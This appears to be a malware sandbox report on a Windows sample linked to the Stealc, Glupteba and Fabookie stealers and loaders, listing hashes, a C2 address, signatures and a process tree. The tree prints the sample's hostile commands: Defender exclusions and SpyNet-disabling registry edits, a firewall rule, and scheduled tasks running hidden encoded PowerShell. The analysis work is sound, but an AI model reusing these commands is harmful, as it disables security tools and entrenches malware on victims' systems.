Analysis
-
max time kernel
0s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
11-01-2024 04:06
General
-
Target
f181b08d7d06f955a53a2593b3596991.exe
-
Size
5.0MB
-
MD5
f181b08d7d06f955a53a2593b3596991
-
SHA1
c2af74c384c68491121799a8d89b5cd4322c41b2
-
SHA256
48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11
-
SHA512
5784992d21762b523176b3a35e5611916568366fc3abf06cff54c6c1a2b77792f5a50f040facc4b3c786edc31d71b1a41d26a3708483289b3867e949fd515731
-
SSDEEP
49152:lhUCgfFMiW4UnAnkOh9pjA7E9HgFRJ9Tp4mMeJmjMjK0JlUJkGf3yIGul:s9AdHBJmg1wJkGZl
Score
10/10
Malware Config
Extracted
Family
stealc
C2
http://185.172.128.79
Attributes
-
url_path
/3886d2276f6914c4.php
rc4.plain
Signatures
-
Detect Fabookie payload 1 IoCs
-
Fabookie
Fabookie is facebook account info stealer.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 15 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\f181b08d7d06f955a53a2593b3596991.exe" -Force1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\f181b08d7d06f955a53a2593b3596991.exe"C:\Users\Admin\AppData\Local\Temp\f181b08d7d06f955a53a2593b3596991.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
-
C:\Users\Admin\Pictures\g4SadwI2XT7iyL3ArBNrdcY1.exe"C:\Users\Admin\Pictures\g4SadwI2XT7iyL3ArBNrdcY1.exe"3⤵
-
-
C:\Users\Admin\Pictures\BZQiuwPFWfxcuSdQEtmxBCJJ.exe"C:\Users\Admin\Pictures\BZQiuwPFWfxcuSdQEtmxBCJJ.exe"3⤵
-
C:\Users\Admin\Pictures\BZQiuwPFWfxcuSdQEtmxBCJJ.exe"C:\Users\Admin\Pictures\BZQiuwPFWfxcuSdQEtmxBCJJ.exe"4⤵
-
-
-
C:\Users\Admin\Pictures\97ue7gQernDRXgcoAcznl2VQ.exe"C:\Users\Admin\Pictures\97ue7gQernDRXgcoAcznl2VQ.exe"3⤵
-
-
C:\Users\Admin\Pictures\aFxatohwjsCvUmfYEKl6zOJS.exe"C:\Users\Admin\Pictures\aFxatohwjsCvUmfYEKl6zOJS.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\nso9530.tmpC:\Users\Admin\AppData\Local\Temp\nso9530.tmp4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nso9530.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵
-
-
-
-
C:\Users\Admin\Pictures\vmAn9QxcjALGa2ydzufkv1VF.exe"C:\Users\Admin\Pictures\vmAn9QxcjALGa2ydzufkv1VF.exe"3⤵
-
-
C:\Users\Admin\Pictures\hz4O3tbKaOJaNZ3iJYtVNTgx.exe"C:\Users\Admin\Pictures\hz4O3tbKaOJaNZ3iJYtVNTgx.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF132.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF2E7.tmp\Install.exe.\Install.exe /snididFpuU "385118" /S5⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRhySNwLH" /SC once /ST 01:41:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRhySNwLH"6⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRhySNwLH"6⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQqfrfOcqJXaOOvqOO" /SC once /ST 04:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\xDZmpHS.exe\" pA /Vksite_idfXv 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\Pictures\WM010lF8EsE1ZH3bUJarHDv7.exe"C:\Users\Admin\Pictures\WM010lF8EsE1ZH3bUJarHDv7.exe" --silent --allusers=03⤵
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240111040658.log C:\Windows\Logs\CBS\CbsPersist_20240111040658.cab1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"1⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes2⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\Pictures\97ue7gQernDRXgcoAcznl2VQ.exe"C:\Users\Admin\Pictures\97ue7gQernDRXgcoAcznl2VQ.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"1⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f1⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F1⤵
- Creates scheduled task(s)
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {4CBB00A9-9620-4226-AC1B-C146289F0813} S-1-5-21-3470981204-343661084-3367201002-1000:GLTGRJAG\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 51⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskeng.exetaskeng.exe {70E03760-0951-4F8A-9150-190C813D5C85} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\xDZmpHS.exeC:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\xDZmpHS.exe pA /Vksite_idfXv 385118 /S2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNnJHApIH" /SC once /ST 00:56:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNnJHApIH"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
4.9MB
-
Filesize
1.0MB
-
Filesize
1.2MB
-
Filesize
444KB
-
Filesize
1.2MB
-
Filesize
5.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
108KB
-
Filesize
12.2MB
-
Filesize
4KB
-
Filesize
232KB
-
Filesize
4.0MB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
6.9MB
-
Filesize
5.4MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
4.0MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
6.9MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
256KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
4.9MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
6.9MB
-
Filesize
32KB
-
Filesize
5.9MB
-
Filesize
5.9MB
-
Filesize
1024KB
-
Filesize
2.2MB
-
Filesize
112KB
-
Filesize
1024KB
-
Filesize
972KB
-
Filesize
2.2MB
-
Filesize
2.2MB